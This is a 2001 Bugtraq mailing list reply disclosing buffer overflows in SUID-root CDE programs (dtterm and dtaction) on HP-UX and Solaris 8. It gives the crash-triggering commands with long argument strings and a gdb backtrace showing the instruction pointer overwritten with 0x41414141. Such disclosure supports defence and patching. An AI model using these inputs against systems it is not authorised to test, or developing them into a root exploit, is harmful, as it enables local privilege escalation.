Bugtraq mailing list archives
Re: OpenUNIX 8 & Unixware possible local root
From: ARAI Yuu <y.arai () lac co jp>
Date: Thu, 04 Oct 2001 22:20:44 +0900
Hi there, This also works on HP-UX: ====================================================================== # uname -a HP-UX moon B.11.00 (snip) # ls -l /usr/dt/bin/dtterm -r-sr-xr-x 1 root bin 65536 May 26 1999 /usr/dt/bin/dtterm # /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'` Memory fault(coredump) # uname -a HP-UX moon B.10.20 A 9000/785 (snip) # ls -l /usr/dt/bin/dtterm -r-sr-xr-x 1 root bin 53248 May 11 1999 /usr/dt/bin/dtterm # /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'` Memory fault(coredump) ====================================================================== And we noticed /usr/dt/bin/dtaction on Solaris 8 and HP-UX 10.20 will cause buffer overflow: ====================================================================== (SPARC/Solaris 8) # uname -a SunOS unknown 5.8 Generic_108528-10 sun4u sparc SUNW,Sun-Blade-100 # ls -la /usr/dt/bin/dtaction -r-sr-sr-x 1 root sys 22808 Dec 2 1999 /usr/dt/bin/dtaction # /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1024'` Segmentation Fault (intel/Solaris 8) # uname -a SunOS unknown 5.8 Generic_108529-09 i86pc i386 i86pc # ls -la /usr/dt/bin/dtaction -r-sr-sr-x 1 root sys 22496 Dec 2 1999 /usr/dt/bin/dtaction # /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1024'` Segmentation Fault # gdb /usr/dt/bin/dtaction --core=core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-pc-solaris2.8"... (no debugging symbols found)... Core was generated by `./dtaction -tn AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation Fault. Reading symbols from /usr/dt/lib/libDtSvc.so.1... (no debugging symbols found)...done. Loaded symbols for /usr/dt/lib/libDtSvc.so.1 Reading symbols from /usr/dt/lib/libXm.so.4...(no debugging symbols found)... done. Loaded symbols for /usr/dt/lib/libXm.so.4 Reading symbols from /usr/openwin/lib/libXt.so.4... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libXt.so.4 Reading symbols from /usr/openwin/lib/libX11.so.4... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libX11.so.4 Reading symbols from /usr/dt/lib/libSDtFwa.so.1... (no debugging symbols found)...done. Loaded symbols for /usr/dt/lib/libSDtFwa.so.1 Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done. Loaded symbols for /usr/lib/libc.so.1 Reading symbols from /usr/dt/lib/libtt.so.2...(no debugging symbols found)... ---Type <return> to continue, or q <return> to quit--- done. Loaded symbols for /usr/dt/lib/libtt.so.2 Reading symbols from /usr/lib/libsocket.so.1...(no debugging symbols found)... done. Loaded symbols for /usr/lib/libsocket.so.1 Reading symbols from /usr/lib/libnsl.so.1...(no debugging symbols found)... done. Loaded symbols for /usr/lib/libnsl.so.1 Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done. Loaded symbols for /usr/lib/libdl.so.1 Reading symbols from /usr/lib/libgen.so.1...(no debugging symbols found)... done. Loaded symbols for /usr/lib/libgen.so.1 Reading symbols from /usr/openwin/lib/libSM.so.6... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libSM.so.6 Reading symbols from /usr/openwin/lib/libICE.so.6... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libICE.so.6 Reading symbols from /usr/openwin/lib/libXext.so.0... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libXext.so.0 Reading symbols from /usr/lib/libmp.so.2...(no debugging symbols found)...done. Loaded symbols for /usr/lib/libmp.so.2 Reading symbols from /usr/openwin/lib/libdga.so.1... (no debugging symbols found)...done. Loaded symbols for /usr/openwin/lib/libdga.so.1 Reading symbols from /usr/lib//liblayout.so...(no debugging symbols found)... done. Loaded symbols for /usr/lib//liblayout.so Reading symbols from /usr/lib/nss_files.so.1...(no debugging symbols found)... done. Loaded symbols for /usr/lib/nss_files.so.1 #0 0xdf004141 in ?? () (gdb) bt #0 0xdf004141 in ?? () Cannot access memory at address 0x41414141 (HP-UX 10.20) # uname -a HP-UX moon B.10.20 A 9000/785 (snip) # ls -l /usr/dt/bin/dtaction -r-sr-sr-x 1 root sys 45056 Feb 5 1999 /usr/dt/bin/dtaction # /usr/dt/bin/dtaction -tn `perl -e 'print "A"x1083'` Memory fault(coredump) # These /usr/dt/bin/dtaction are installed as SUID root. Therefore, it might be possible to gain root privilege. Regards, ----------------------------------------------- ARAI Yuu <y.arai () lac co jp> Network Security Specialist / LAC Computer Security Laboratory http://www.lac.co.jp/security/
Current thread:
- OpenUNIX 8 & Unixware possible local root Aycan Irican (Oct 02)
- Message not available
- Re: OpenUNIX 8 & Unixware possible local root Aycan Irican (Oct 03)
- Message not available
- <Possible follow-ups>
- RE: OpenUNIX 8 & Unixware possible local root Cushing, David (Oct 03)
- Re: OpenUNIX 8 & Unixware possible local root Rob Bartlett - CPRE EMEA (Oct 03)
- Re: OpenUNIX 8 & Unixware possible local root KF (Oct 03)
- RE: OpenUNIX 8 & Unixware possible local root Bob Dog (Oct 03)
- RE: OpenUNIX 8 & Unixware possible local root Bob Dog (Oct 03)
- Re: OpenUNIX 8 & Unixware possible local root ARAI Yuu (Oct 04)
- RE: OpenUNIX 8 & Unixware possible local root Lamont Granquist (Oct 04)
- Re: OpenUNIX 8 & Unixware possible local root Scott J (Oct 04)